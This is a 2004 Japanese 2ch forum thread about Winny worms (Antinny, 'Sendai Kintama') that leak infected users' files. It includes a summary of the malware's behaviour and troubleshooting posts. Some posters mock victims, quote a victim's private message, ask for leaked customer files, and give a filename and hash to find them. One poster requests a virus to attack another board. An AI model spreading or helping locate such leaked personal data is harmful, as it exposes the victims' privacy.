787 :[名無し]さん(bin+cue).rar:04/11/08 22:30:22 ID:IpZjqFCU
>>784
おまえ、なんでこのスレにいるの?

788 :[名無し]さん(bin+cue).rar:04/11/08 22:35:11 ID:C2GWcfaY
感染者の個人情報の中に職務経歴書なんてのがあったのだが

199X〜 XXXX製ホストコンピュータメンテナンス、汎用機に至るまでのハードウェアサポート業務
199X〜 ネットワークインテグレーション部門へ配属。XXXX製ネットワーク機器を中心とした、ネットワークインフラ構築

ダメすぎ…、P2Pで遊んでて、しかも感染するとは。XXXXのSIなんて信頼のかけらもないな(w

789 :[名無し]さん(bin+cue).rar:04/11/08 22:36:53 ID:CzBrgBXe
>>788
そんなもん入れたPCでnyやってんのか、すげえな
でも普通に可哀相だな

790 :[名無し]さん(bin+cue).rar:04/11/08 22:39:45 ID:wgpJZtTi
>>789
>>775みたいな奴がこういうのに引っかかるだよ

791 :[名無し]さん(bin+cue).rar:04/11/08 22:39:51 ID:AVVXhfRj
ITの記事見て、やべ漏れも感染したか!
とドキドキしながらチェックしてもたけど、なんとも無かった。
仕込まれていると思われるエロゲもダウソしてあった。
解凍のテストしただけで、まだPlayしてなかった。
Viva! 奇跡。
メール漏れたらやばいって。会社のメールも受信してんぜ。
恥ずかしくて首吊りものだってばよ。
メーラー変えようかな。

792 :790:04/11/08 22:40:20 ID:wgpJZtTi
>>775で書かれてたみたいな奴 に訂正

793 :[名無し]さん(bin+cue).rar:04/11/08 22:40:41 ID:C2GWcfaY
つか………

アカウント晒した挙句に、出会い系へのカキコかよ

> いきなりこういう話しをするのも気が引けるんですけど、
> 出会い系サイトということで思い切って言ってみます。
> 実は奥手なのでいまだに童貞です。
> 初めての相手になって、いろいろ教えてもらえないでしょうか?

もう笑うしかないな

794 :[名無し]さん(bin+cue).rar:04/11/08 22:43:01 ID:YUUoWvep
【仙台ギャラクシーエンジェルズ】Winny新ウィルス
http://tmp4.2ch.net/test/read.cgi/download/1099799904/

晒しは専用スレでやれって

795 :789:04/11/08 22:45:36 ID:CzBrgBXe
>>775かよ!と思ってドッキリしてた俺

796 :[名無し]さん(bin+cue).rar:04/11/08 22:47:19 ID:C2GWcfaY
>>794
すまん、場の雰囲気に流されてしもた。深くまじめに反省。
のでID換えて出直してくる。

797 :[名無し]さん(bin+cue).rar:04/11/08 23:00:19 ID:G3Pj+IRv
見ていて痛い。赤ちゃんの写真かわいいのにお母さんnyですか。三重大学の某君もw
保存していたハメ撮り画像を公開した人は、これからの人生どうするんだろう。
家具屋のご主人はすっかり有名人になったけど、今頃どうなっているんだろ。

798 :[名無し]さん(bin+cue).rar:04/11/08 23:01:08 ID:Rhgd1aT/
何らかの方法でウイルス警告を出すプログラムって作れないのか?

例えば、システムに常駐してUpFolder.txtを監視して変更
された時にユーザに通知するとか。

799 :[名無し]さん(bin+cue).rar:04/11/08 23:02:27 ID:VHbLCUR+
>>798 頼んだ

800 :798:04/11/08 23:07:51 ID:Rhgd1aT/
>>799
俺は無理だ。
HSPちょっとかじった程度で本格的なプログラムなんぞ組めん。

801 :[名無し]さん(bin+cue).rar:04/11/08 23:09:21 ID:iGyr3vBu
>>797
せめて、感染源を突き止めて、先生たちに対応してもらうぐらいしかないか...
とは思ってるんだが、[私]シリーズの本体が分からんのよ。
それで晒されてる個人情報から、元祖仙台キンタマとの共通晒し項目を探そうとしてるんだが。

つい、個人情報見てて笑ってしまったりな…
まぁ漏れは被害者救済とか考えてないんで純粋な好奇心なんだけどよ

802 :[名無し]さん(bin+cue).rar:04/11/08 23:17:00 ID:PAcf6WX8
ダメージでは最強クラスだな、HDD全消しの方が遥かにましだ

803 :[名無し]さん(bin+cue).rar:04/11/08 23:19:09 ID:wgpJZtTi
何の対処もせず、スキルも得ようとせずWinnyなんかやって感染してたら、それこそ自業自得だろ。
香田と同じだ。

804 :[名無し]さん(bin+cue).rar:04/11/08 23:21:25 ID:h/tj0UpC
Nortonウィルス定義 とりあえずベータ版で対応?
ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe

805 :[名無し]さん(bin+cue).rar:04/11/08 23:25:01 ID:h/tj0UpC
>>804 きれいに張り付かんかった・・・
f tp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe

806 :[名無し]さん(bin+cue).rar:04/11/08 23:28:55 ID:ExcnklwD
携帯番号から絵描き板のIDからガンホーIDからなにから、、、

・・・・ま た ラ グ ナ か よ

807 :[名無し]さん(bin+cue).rar:04/11/08 23:29:56 ID:6+PjKm54
>>735
> しかし、放流機能なし。
放流機能あるって。

WinnyのUpfolder.txtに、、詰め合わせを置く隠しフォルダを追加していくよ。

808 :[名無し]さん(bin+cue).rar:04/11/08 23:32:39 ID:ormkcrVj
>>797
はめ撮りのヒントだけでも教えて

809 :[名無し]さん(bin+cue).rar:04/11/08 23:53:09 ID:PAcf6WX8
ぼちぼち騒ぎも収束気味だから次スレタイはどうでもよさそうね

810 :[名無し]さん(bin+cue).rar:04/11/09 00:12:37 ID:C/ouSSIV
>>809
スレタイ変えたところで厨は来る。
>>1をこんな感じでテンプレ読むように強調するぐらいでいいんじゃない。


Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
ここは『初心者の質問スレ』ではありません。
『質問はテンプレを読んでから』にして下さい。
読まずに質問しても『テンプレ嫁』と切り返されるだけです。
余裕があれば過去ログにも目を通してください。


811 :[名無し]さん(bin+cue).rar:04/11/09 00:28:56 ID:tfHCsXyj
>>804
サンクス、それ適用したところ
例の トリップなし .scr偽装ものを、W32.HLLW.Antinny.G(キンタマ)として
先生が識別した。収束に向かうかな…


812 :[名無し]さん(bin+cue).rar:04/11/09 01:00:46 ID:Kb4VF+i8

結局、仙台キンタマはブラフ、というか、仙台ギャラクシー〜といういかにも
野次馬が集まってきそうな餌で、それが放流した詰め合わせを狙って集まって
くる香具師を引っ掛けようとしたのが、女名トリップなしの詰め合わせ(.scr)ってことか。


手が込んできたな

813 :[名無し]さん(bin+cue).rar:04/11/09 01:09:13 ID:UF3foPJg
仙台の女の名前の詰め合わせの.scrが、私の好きな人の感染源か?
キンタマのときも、あの手で、騙されていたので、今回は騙されなかった。
赤シャツの香具師の画像を何度もおがまされたっけw

814 :[名無し]さん(bin+cue).rar:04/11/09 01:32:07 ID:rJHk9NHB
雑魚共なら晒されても大したことないが、
俺が晒されたら新聞(ry

815 ::04/11/09 01:40:58 ID:OGwE3sL+
菊池?

816 :[名無し]さん(bin+cue).rar:04/11/09 02:03:49 ID:omUX/Ra9
おーい菊池、隠れてないでこっち来いよ〜

817 :[名無し]さん(bin+cue).rar:04/11/09 03:03:22 ID:RPsRnYy9
バスターは対応遅いねぇ

818 :[名無し]さん(bin+cue).rar:04/11/09 03:20:27 ID:LpnoczQR
京都府警 犯罪性の濃いものは
http://www.pref.kyoto.jp/fukei/
ACCS(コンピュータソフトウェア著作権協会) アプリケーションは
http://www.accsjp.or.jp/
JASRAC(日本音楽著作権協会) 音楽データは
http://www.jasrac.or.jp/
JIMPA(日本国際映画著作権協会) 映画は
http://www.jimca.co.jp/
JCA(日本著作権機構) その他の事は
http://jca.net-b.co.jp/
JPCA(日本写真著作権協会) 画像データは
http://www.jpca.gr.jp/
JVCA(日本ビジュアル著作権協会) 画像データは
http://www.jvca.gr.jp/

著作権情報センター
http://www.cric.or.jp/
任天堂
http://www.nintendo.co.jp/
ハドソン
http://www.hudson.co.jp/index.html
ソニー
http://www.sony.co.jp/

819 :[名無し]さん(bin+cue).rar:04/11/09 04:40:23 ID:Joj9Wo2y
マイドキュメント(空白).scr何個か落としたら入ってるのが違うものが幾つかあった

[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 女の名前[日付](ファイル詰合せ).zip
   |
  ZIPと同じ名前のフォルダ
      |→個人情報**(数字).txt(中身は「個人情報」が大量に書かれてる)
      |→マイドキュメント(空白).scr


[仙台ギャラクシーエンジェルズ] [俺のデスクトップ]女の名前 [日付](ファイル詰合せ).zip
      |→ビン・ラディン携帯待ちうけ.gif
      |→高橋愛の写真.jpg
      |→(お宝)(事件)(犯罪)(ショタコン)(殺人)XXXXXXXXX.jpg  (一応伏せとく)
      |(お宝)宇多田ヒカル-卒業名簿写真.jpg
      |マイドキュメント(空白).scr


[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 女の名前[日付](ファイル詰合せ).zip
      |→password.txt  (1000件のアドレス等を30回繰り返した30000件分)
      |→マイドキュメント(空白).scr


この三種類


820 :[名無し]さん(bin+cue).rar:04/11/09 04:41:20 ID:Joj9Wo2y
ごめんなさい sage忘れてしまいました

821 :[名無し]さん(bin+cue).rar:04/11/09 05:36:51 ID:UkqXSvbo
先生ってAutorunとかSetupとか実行する前に中身を検査してくれるの?
それとも動かしたあとに対応してくれるだけ?

822 :[名無し]さん(bin+cue).rar:04/11/09 05:39:47 ID:Joj9Wo2y
マイピクチャ(空白).scrってのがありました
マイドキュメントとバイナリ比較したら一致したので同じものだと思います。

[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] 女の名前[日付](ファイル詰合せ).zip
     |
   同じ名前のフォルダ
        |→マイピクチャ(空白).scr
       WinNT(空のフォルダ)
          |
         System32(空のフォルダ)



823 :[名無し]さん(bin+cue).rar:04/11/09 08:46:02 ID:hrksc6JM
[仙台ギャラクシーエンジェルズ] [俺のデスクトップ]、多すぎ。

ファイル数22991まで逝った。容量は3.00 GB (3,231,717,544 バイト)。
もうやめだ、ヤメヤメ。きりがない。

824 :[名無し]さん(bin+cue).rar:04/11/09 09:23:22 ID:Y35U3Ie2
2ちゃんねらの組織票に負けたどこかみたいな発言だな(w

それはさておき、晒し名称で統計とって「50名なんて少なすぎるぞ」と
イソプレスにたれこんでやってくださいませ。

825 :[名無し]さん(bin+cue).rar :04/11/09 09:46:37 ID:VZBfrizT
ギャラクシーエンジェルといえばちとせがそれっポイ

826 :[名無し]さん(bin+cue).rar:04/11/09 10:14:13 ID:eP3zuTq6
おんなじやつが気がつかずに何度も放流されてるけど、感染者50人ってことはないだろう。

827 :[名無し]さん(bin+cue).rar:04/11/09 11:18:46 ID:rE+elkp9
きっと、自分が見たいものしか目に入らないんだよ。

‥‥シックスセンス?

828 :[名無し]さん(bin+cue).rar:04/11/09 11:19:25 ID:T9RmRg+d
もうexeファイルを実行するときはさ
「EXEファイルだけど本当に実行しますか?」ってポップアップが出て
必ず再確認できるようにして欲しいよ

829 :[名無し]さん(bin+cue).rar:04/11/09 11:34:51 ID:86T6Fy6F
んなもんうざすぎ

830 :[名無し]さん(bin+cue).rar:04/11/09 11:36:15 ID:SY7QSUgU
>828
SP2入れれば?

831 :[名無し]さん(bin+cue).rar:04/11/09 12:37:57 ID:dmmB6ujS
仙台w2flで1晩検索してもまったく引っかからん
もちろん自分は感染してない
ほんとに流行ってるの?

832 :[名無し]さん(bin+cue).rar:04/11/09 12:46:21 ID:AiXz0MMq
ほんとに感染してないの?

833 :[名無し]さん(bin+cue).rar:04/11/09 13:06:32 ID:yXf2BlpB
デスクトップ画像をWinnyで流通させる正体不明のウイルス
〜ネットエージェント杉浦氏「開発者はほぼ特定」
ttp://internet.watch.impress.co.jp/cda/news/2004/11/08/5303.html

834 :[名無し]さん(bin+cue).rar:04/11/09 13:06:47 ID:1JUWd2r6
  仙台もほ・・   クマ?
   ∩___∩         |
   | ノ\     ヽ        |
  /  ●゛  ● |        |
  | ∪  ( _●_) ミ       j
 彡、   |∪|   |        J
/     ∩ノ ⊃  ヽ
(  \ / _ノ |  |
.\ “  /__|  |
  \ /___ /



835 :[名無し]さん(bin+cue).rar:04/11/09 13:14:09 ID:Atig5Asa
>>831

無視条件をクリアして再検索してみ

ておくれだったかな

836 :[名無し]さん(bin+cue).rar:04/11/09 14:42:15 ID:n4beC51E
テンプレを読んだうえでウイルスについて質問したいのですが初心者質問スレではないとの事なので
どこか適切なスレッドを教えてください。

837 :[名無し]さん(bin+cue).rar:04/11/09 14:52:22 ID:EUQz5LcZ
>>836
わーい、釣りだ

838 :[名無し]さん(bin+cue).rar:04/11/09 15:03:42 ID:eRvj1iJ+
>>836
セキュリティ
http://pc5.2ch.net/sec/

839 :[名無し]さん(bin+cue).rar:04/11/09 15:06:18 ID:n4beC51E
>>838
ありがとうございました。助かります。

840 :[名無し]さん(bin+cue).rar:04/11/09 15:09:58 ID:WHNA7o0N
[System]
Path=C:\WINDOWS\System32\SystemDll
Trip=
[Winny Setting]
Path=C:\Documents and Settings\Owner\My Documents
Trip=

あれ・・・・・?

841 :[名無し]さん(bin+cue).rar:04/11/09 15:43:38 ID:0iUIEwV7
>>840
感染おめでとう

842 :[名無し]さん(bin+cue).rar:04/11/09 15:55:31 ID:sjJCC1+/
よし、今日は赤飯だ

843 :[名無し]さん(bin+cue).rar:04/11/09 15:57:48 ID:AiXz0MMq
やめてよお赤飯なんて!お父さんにばれるでしょ!

844 :[名無し]さん(bin+cue).rar:04/11/09 16:02:00 ID:qLU2+BT7
よし、今日はいか飯だ

845 :840:04/11/09 16:16:17 ID:WHNA7o0N
システムDドライブでCドライブ自体がつないでないんですが
以前exe押し間違えたあと再インスコしたnyのファイルが残ってただけだと信じたい…

で、これ何のウイルス?

846 :[名無し]さん(bin+cue).rar:04/11/09 16:23:17 ID:8WwfQVfs
よし、今日は栗ご飯だ

847 :[名無し]さん(bin+cue).rar:04/11/09 16:24:14 ID:VB/I7F11
俺なんか残飯だ(´・ω・`)

848 :[名無し]さん(bin+cue).rar:04/11/09 16:26:02 ID:G+r5XuRd
一日三食食べたい
一日三食食べたい
一日三食食べたい

849 :[名無し]さん(bin+cue).rar:04/11/09 16:27:11 ID:VB/I7F11
ここはひもじいスレになりました

850 :840:04/11/09 16:28:56 ID:WHNA7o0N
x・)つ ねこまんま

もう再インスコする方が早いのか・・・_no

851 :[名無し]さん(bin+cue).rar:04/11/09 16:30:26 ID:Zh9fQUPi
>850
窓からPCを投げ捨てろ

852 :[名無し]さん(bin+cue).rar:04/11/09 16:30:26 ID:eKJi+C25
>>850
ここで質問するよりそっちのが早いね

853 :[名無し]さん(bin+cue).rar:04/11/09 16:39:51 ID:8WwfQVfs
>>850
スカッと入れなおして、心もスカッとしようぜ。

854 :[名無し]さん(bin+cue).rar:04/11/09 16:47:10 ID:/met8+pr
九州の家具屋の顧客に個人情報流出の事実を
教えてやった香具師いる?

855 :[名無し]さん(bin+cue).rar:04/11/09 16:48:19 ID:Zh9fQUPi
>854
面倒くさいことになるかもしれんし、関わらないほうがいいと思うぞ

856 :[名無し]さん(bin+cue).rar:04/11/09 16:54:46 ID:/met8+pr
>>855
みんなでやれば怖くな(ry

857 :[名無し]さん(bin+cue).rar:04/11/09 16:56:56 ID:n85i6x0j
九州ってなに県?
福岡なら週末に特攻してもいいぞ。

858 :[名無し]さん(bin+cue).rar:04/11/09 16:57:29 ID:/ZH/PgP5
ひろゆきブログ、Winnyについて語る。

【ファイル共有の未来は真っ暗、権利者にとっては。】
http://blog.livedoor.jp/hirox1492/archives/9022790.html

859 :[名無し]さん(bin+cue).rar:04/11/09 17:02:27 ID:/met8+pr
>>857
福岡だよ。

860 :[名無し]さん(bin+cue).rar:04/11/09 17:04:20 ID:n85i6x0j
マジで?
何で検索したらそのファイル出てくるの?

861 :[名無し]さん(bin+cue).rar:04/11/09 17:11:28 ID:/met8+pr
>>860
[041104-2018][It's][eshop][Arc-shop][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

862 :[名無し]さん(bin+cue).rar:04/11/09 17:19:31 ID:HbM0aw9r
ウィルス製作者が特定されたってのははったりだろうけど
金玉製作者で逮捕されたら何よりも無茶苦茶かっこわりーな


863 :[名無し]さん(bin+cue).rar:04/11/09 17:19:31 ID:n85i6x0j
>>861
サンクス。
ファイル落としたら報告します。

864 :[名無し]さん(bin+cue).rar:04/11/09 17:55:36 ID:h/WDE0NG
あの日韓掲示板を攻撃するウィルスきぼんぬ。

865 :[名無し]さん(bin+cue).rar:04/11/09 18:53:33 ID:n85i6x0j
ぜんぜん見つからないorz

866 :[名無し]さん(bin+cue).rar:04/11/09 19:07:28 ID:yXf2BlpB
京都腐警なら製作者でっちあげて逮捕しそう||Φ|(|゚|д|゚|)|Φ||

867 :[名無し]さん(bin+cue).rar:04/11/09 19:16:36 ID:4ElSjSLP
むしろ犯人は警察関係者のような気がする

868 :[名無し]さん(bin+cue).rar:04/11/09 19:23:46 ID:5D2KqKNh
[私には好きな人がいます]のほうの仙台に
PTAに見つかったら家具屋よりダメージ受けそうな人のあるね

869 :[名無し]さん(bin+cue).rar:04/11/09 19:25:19 ID:+5cOWWL0
ニートみたいなゴミの意見なんて聞いてらんね('A`)
早く逮捕しちまえよ

870 :[名無し]さん(bin+cue).rar:04/11/09 21:00:00 ID:4ElSjSLP
NyやっててDownload板チェックしないなんてぶっちゃけ有り得ない
だってやってらんないじゃん性欲よりプライバシーでしょ

871 :[名無し]さん(bin+cue).rar:04/11/09 21:01:37 ID:hrksc6JM
>>854
みそら保育園のやつね。でもあんまり面白くは無かった。

872 :[名無し]さん(bin+cue).rar:04/11/09 21:02:48 ID:4ElSjSLP
>>871
成績評価大盛りの2年B組担任数学教師のは見たか?

873 :[名無し]さん(bin+cue).rar:04/11/09 21:51:39 ID:EVtLzBih
ではここで簡単なまとめ

・元祖仙台キンタマ(仙台ギャラクシーエンジェルズ)
  エロゲの「ホットギミックフォーエバー」「こんねこ」「グリグリ2」に
  それぞれ少しずつ違うタイプの実行ファイルとして混入
      →ノートン先生がW32.SillyP2Pとして対策済
  症状:壁紙を赤くする、ファイル詰合わせ放流、SS放流、ny関連のtxtから情報抽出して放流など
     時限発動でSS詰め合わせを(画像詰め合わせ)として放流かも?

・2次感染を狙ったもの(たぶん作者は仙台キンタマと同一)
  仙台キンタマが放流する詰合わせに偽装したもの
  (ユーザー名が2-3文字の女性名、トリップ無し)に
  混在の.scr(スクリーンセーバ偽装)
      →ノートン先生が Antinny.Gとして緊急対策済(次回定例更新時に反映)
   症状:HDD内から.doc .xls .txt .jpgを検索してすべてを収集し
      nyネットワークに放流する(恥ずかしい.jpg画像やメール送受信記録、Cookieなど)

結論:結局、仙台キンタマはブラフ、というか、仙台ギャラクシー〜といういかにも
   興味本位な野次馬が集まってきそうな餌を撒き、放流した詰め合わせ(餌)につられて
   集まってくる香具師を引っ掛けようとしたのが、女名トリップなしの詰め合わせ(.scr)
   ってことか。壮大な釣。


874 :[名無し]さん(bin+cue).rar:04/11/09 21:55:35 ID:X5CDwgKC
スクリーンセーバ偽装っていうのは最近出てきたものなの?

875 :[名無し]さん(bin+cue).rar:04/11/09 22:07:42 ID:P4/GXC3B
          ! : ヽ.  ,,:::''''    ヽ. ____       ,. -' 、
        l  : : : :\      __’..’ 三ニY~ヽ´'''‐  ヽ
         |  : : : : : ヽ -,.r''´ ̄:.:.:.:.:..:.:.:.:.:.:.:ヾr'      ',
        l  . : , ‐'´:/:.:.:.:.:.:.:.:.:.:.:.:.:.;_;.'´-:.:.:.:.ヽ―-、  i
        .l /:.:.:.:, ':.:.:.:.:.:.:.:.:.:.:.:.::/......   :.:.:.:.:.:.:.:.:.:.:.ヽ  !
       /:.:.:.:.:.:/:.:.:.:/:.:.:.:.:.:.::/:._:.:.:.:.:.:.:.:.:.....  :.:.:.:.:.:.:ヽ. l
.      , ':.:.:.:.:.:.:.:/:.:.:::/:.:.:.:.:._∠ニ..」:.:.:.:,:.:.:.:.:.:.:.:.:.:..  :.:',:.:i !
.     ,.':.:.:.:.:.:.:.:.:,':.:.::::/:.:.:.:.::;/-‐- 、 |`ヽ|:.:.:.:.:.:.:.:.:.:.:.:.:.:... ',:.l′
.   /:.:.:.:.:.;.:.:.:.:.l,r'´゙i:.:,イ:.i´イ、ノ:::::}ヽ!/ l:.:.:.:.:.:.:./:.:.:.:.,:.:.:..i:.|
   /:.:.:.:.:./:.:.:.:./   !,' l:.::l;':::::::::::::/    l::.:.:.:./7ヽイ:.:.:.:.:l:.i
  ,':.:.:.:.::/:.:.:.:.:.:'、   ! l:::ヾ、::_,ン′    l;:; ,r/イ´〉:.:.:.:.ノ:,'
.  i:.:.:.:.::;':.:.:.:./:.:.ヽ ___  l:!         '/:::::::;リ/ -‐'´:./
.  !:.:.:::::i:.:.:/:.:.:.:.:.:.:\lヽ !         {、_ン' 〃:.:::::./
  l:.:.:::::l:.; ':.:.:.:.:,; -'´:.:.:.>''ヽ、     (⌒,  `  ノ:./!/   
 _l:::.:::::/_;:- '´:.:.;. -''´,. -―‐-r、_     __,. ‐'-'´ /  
. r'⌒ヾニ-ァ^ヽ´,. '´/      }:::. ̄ ̄:.:.:/
 ´, ヽ }/ /  ヽ <       j::.:.:.:/:.:.:.; '
 ヾ-i'r'.r'    } / l _   ,イ l、/:./
 、:.:|'/   _r' /  ´ ,ヽ/、l{_」ヾ.Y
  `/.___,./  /    /    ト'r '′



876 :[名無し]さん(bin+cue).rar:04/11/09 22:11:51 ID:5tkFcO8i
     シュッ
 (;´Д`) ハァハァ
 Σ⊂彡_,,..i'"':
     |\`、: i'、
     \\`_',..-i
       \|_,..-┘


877 :[名無し]さん(bin+cue).rar:04/11/09 23:59:22 ID:2TB0YUI5
まとめを読んでいてふと思い出したが、
そういえば某業界人用スレで
ダミー作って流せみたいなことを
書いてる連中が居たなぁ〜…

とか言ってみるテスツ。

878 :[名無し]さん(bin+cue).rar:04/11/10 00:01:33 ID:3KjzOfWi
まだNyのせいでCDが売れないと思ってる香具師がいるのか

879 :[名無し]さん(bin+cue).rar:04/11/10 00:08:37 ID:AkNCV0Lq
>>878
さて、そういうお前の見解を聞いてみたいのだが。
お前はなぜCDが売れないと思う?

880 :[名無し]さん(bin+cue).rar:04/11/10 00:12:03 ID:PlAWxOgI
>>879
買う必要がないから

>>877
ここだな

プロテクト・違法コピー問題総合スレ Part10
http://pie.bbspink.com/test/read.cgi/erog/1093173937/

881 :878の皮を被った880:04/11/10 00:12:16 ID:jh62+6gV
>>879
高いから(金出してまで聞きたくないから)

882 :[名無し]さん(bin+cue).rar:04/11/10 00:12:48 ID:pvo7AeGk
ギャラクシーって、萌え写真とか萌え動画とかの流失あったの?

883 :道化師:04/11/10 00:13:14 ID:jh62+6gV
遅かった_| ̄|○

884 :[名無し]さん(bin+cue).rar:04/11/10 00:17:56 ID:AkNCV0Lq
>>881
なるほどな。俺は音楽配信サービスが主な原因かと思ってたが。
高いというのはもろに関係してくるか。

スレに関係ないことを聞いてしまったな。スマソ。

885 :[名無し]さん(bin+cue).rar:04/11/10 00:48:51 ID:EAUy/uO5
>>880
いや、見たのはソコじゃなかったな…
しかしどこのスレにも似たような奴が…

886 :[名無し]さん(bin+cue).rar:04/11/10 01:21:15 ID:zWWi1NfT
訴えればいいじゃん。

「善意の第三者であるぼきが! せっかくはあはあしてあげようとダウソしたのに
 トロイなんて仕込む極悪人がいるんでしゅよ!」とかさ。

887 :[名無し]さん(bin+cue).rar:04/11/10 01:25:01 ID:+lRW+AQK
さらにスレのレベルが下がってるな・・・

888 :[名無し]さん(bin+cue).rar:04/11/10 01:27:03 ID:123EqHKJ
感染者は被害届出しておけよ
作者逮捕されたら損害賠償請求できるかもしれんよ


889 :[名無し]さん(bin+cue).rar:04/11/10 01:28:47 ID:zWWi1NfT
あ、でも修復してデリートした場合感染証明ってどうやってするのかな。
感染してる状態で警察呼んで見てもらわなきゃダメ?

890 :[名無し]さん(bin+cue).rar:04/11/10 02:31:58 ID:bYHt7kjt
コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
コンピュータウイルス110番の電話もあるぞ

891 :[名無し]さん(bin+cue).rar:04/11/10 02:46:09 ID:+gmFY7OX
でも警察呼んだらお前逮捕されちゃうかもよw
m9(^Д^)プギャーーーッ

892 :[名無し]さん(bin+cue).rar:04/11/10 02:50:12 ID:j4SFw3T2
>>889
そこらの警察呼んでも「クリックしても開きませんでした」って言われるのがヲチ

893 :[名無し]さん(bin+cue).rar:04/11/10 02:52:38 ID:SfJYxqbT
警官がみんな技能をもってないろくでなしだと思い込んでるのって素敵だわ

894 :[名無し]さん(bin+cue).rar:04/11/10 02:58:31 ID:/Zv6fClM
と、警官でありながらshareでバリバリ違法行為をしている>>893(ヤクザ?)が
おっしゃっております。

895 :[名無し]さん(bin+cue).rar:04/11/10 03:54:17 ID:WCP7VjnD
警官はみんなハッカーだよ

896 :[名無し]さん(bin+cue).rar:04/11/10 04:04:50 ID:MaKLM32K
winnyとかキンタマとか警察も自衛隊も懲りたでしょう。
2chは日本の安全保障に役立ってるよね。

897 :[名無し]さん(bin+cue).rar:04/11/10 04:18:07 ID:j4SFw3T2
まぁ、スレ違いなんだが、2chぐらいで済んでよかったよな
諸外国なら、そんなゆるい組織はいい標的だもんな

898 :[名無し]さん(bin+cue).rar:04/11/10 05:00:44 ID:G3gdF1uN
キンタマのおかげでny作者逮捕って話もあるがな

899 :[名無し]さん(bin+cue).rar:04/11/10 07:18:47 ID:d1cTRFBe
被害届を出そうぜ。
証拠としてHDDもってかれてハピー!ハピー!ハピー!

900 :[名無し]さん(bin+cue).rar:04/11/10 07:45:59 ID:Zcec9LM7
三日くらい前に .scr踏んだんだけど、
先生の最新定義でスキャンしても引っかからない。
感染してなかったと喜ぶべきなのかな…?

((((((;゚Д゚))))))ガクガクブルブル

901 :[名無し]さん(bin+cue).rar:04/11/10 07:57:43 ID:42x4SDQh
もう亜種が出たのか?

902 :[名無し]さん(bin+cue).rar:04/11/10 08:01:27 ID:SfJYxqbT
亜種なんてすぐに出回るだろ
知識ある人がその気になりゃ一日で新種も作れるし

903 :[名無し]さん(bin+cue).rar:04/11/10 08:08:27 ID:H2DFgnbp
>>900
(o^-')b コンニチハ!!!

904 :[名無し]さん(bin+cue).rar:04/11/10 09:51:33 ID:uwQ5y83i
>>900
先生の5日定義だと引っかからなかった仙台.SCR(例の女性名晒し群)は
9日の定義(インテリアップの方ね)だとW32.Antinny.Gとしてひっかかった。

………あれキンタマだったの?(´・ω・`)最近名称がイイカゲン

905 :[名無し]さん(bin+cue).rar:04/11/10 09:55:07 ID:94lB8wvZ
自社のソフトも沢山流れてるのに対応しなきゃいけないのは複雑だよな

906 :[名無し]さん(bin+cue).rar:04/11/10 10:03:58 ID:zWWi1NfT
駆除履歴はフィードバックされるはずだからワレザー様一覧リストが出来上がりそうだ

907 :[名無し]さん(bin+cue).rar:04/11/10 10:12:07 ID:94lB8wvZ
>>906
ユーザー情報までは送信してないのでは?
と釣られてみるテスト

908 :[名無し]さん(bin+cue).rar:04/11/10 10:19:27 ID:zWWi1NfT
個体識別のためにシリアル相当のものは付けるんじゃあないか。
アンチウイルスの送信データを解析したひとっている?

909 :[名無し]さん(bin+cue).rar:04/11/10 11:36:27 ID:WTud+0Ne
うはあ。ひさしぶりにウィルス解析ミスったw
仮想とは言え酷い荒らし方だな… orz...
仙台は弱いけど、亜種が厄介だね。
気付けば良いけど気付かないとリブートでw
まあ、最初の犠牲者が報告すれば終わることでしょうけど。

910 :[名無し]さん(bin+cue).rar:04/11/10 11:54:08 ID:AeMMtV5p
なんか面白いの落としたいんだけど手当たり次第だとマンドクセ

911 :[名無し]さん(bin+cue).rar:04/11/10 11:57:02 ID:L+3ww3L0
レジストリエディタはどこかにコピーしておいたほうがいいな

912 :[名無し]さん(bin+cue).rar:04/11/10 13:12:00 ID:LEUH6BM8
誰か家具やの奴うpしてくれません?

913 :[名無し]さん(bin+cue).rar:04/11/10 13:27:16 ID:R0xVzB3x
>>912
厄介なことになりかねないから嫌だ。

nyで探せよ。

914 :[名無し]さん(bin+cue).rar:04/11/10 13:48:30 ID:LEUH6BM8
昨日から探してんだけど全然見つかんなくて・・・


915 :[名無し]さん(bin+cue).rar:04/11/10 13:59:21 ID:4bi507U7
何かタスク開く前にウインドウズのセキュリティのウインドウが出ますが、
そのログオン情報のユーザー名にNOEBOOK・・・・・。  orz
これってウイルスでつかね・・・・。  ????   

916 :[名無し]さん(bin+cue).rar:04/11/10 14:08:30 ID:d1cTRFBe
>>915
もうだめぽ

917 :[名無し]さん(bin+cue).rar:04/11/10 14:09:56 ID:qqLbwV0Q
>>915
PCを窓から投げ捨てろ

918 :915:04/11/10 14:18:18 ID:4bi507U7
あ、修正・・・・。
ユーザー名にNOEBOOK=>ユーザー名の後に\NOTEBOOK

919 :[名無し]さん(bin+cue).rar:04/11/10 14:21:44 ID:R0xVzB3x
>>914
まず自分が感染してないか確認しろ。

[041104-2018][It's][eshop][Arc-shop][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip 179,862,198 c52f1fa3fc30f00ac03906078fc0f292

これだろ?エロゲクラスタにしとけば見つかるぞ。


>>915
お前の言ってることが良く分からんのだが……俺だけ?
タスクって、コントロールパネルにあるあれか?

それと、環境くらい書け。

920 :[名無し]さん(bin+cue).rar:04/11/10 14:35:11 ID:gvXuuhEw
>>919
安易に曝すのはまずいよ、コレ。
もし、Nyで流れている資料のせいで商売が上手くいかなくなったり顧客を失ったりした場合、
被害者は、”とりあえず”こういう風に曝している人を訴えるだろうから。IP特定可能だし。

921 :915:04/11/10 14:36:00 ID:4bi507U7
【使用OS】 XP Home(SP2対応済み)
【WindowsUpdateしてるか】 一昨日しました・・・・。
【AntiVirusは】先生の2003してます。
【ちゃんとUpdateしてるか】 昨日定義落として入れたばっかりです。
【スキャンした結果】 なにもなし
【オンラインスキャンしたならその結果は】↑に同じ
【Winnyのバージョン】 b7.1
【Winny歴、総DL量は】 1年、分からない。
【テンプレを読んだか】 Part27ぐらいからずっとみてます。
【テンプレにある対策を実行したか】 してます。

症状は、ようこそ画面を拒否して、
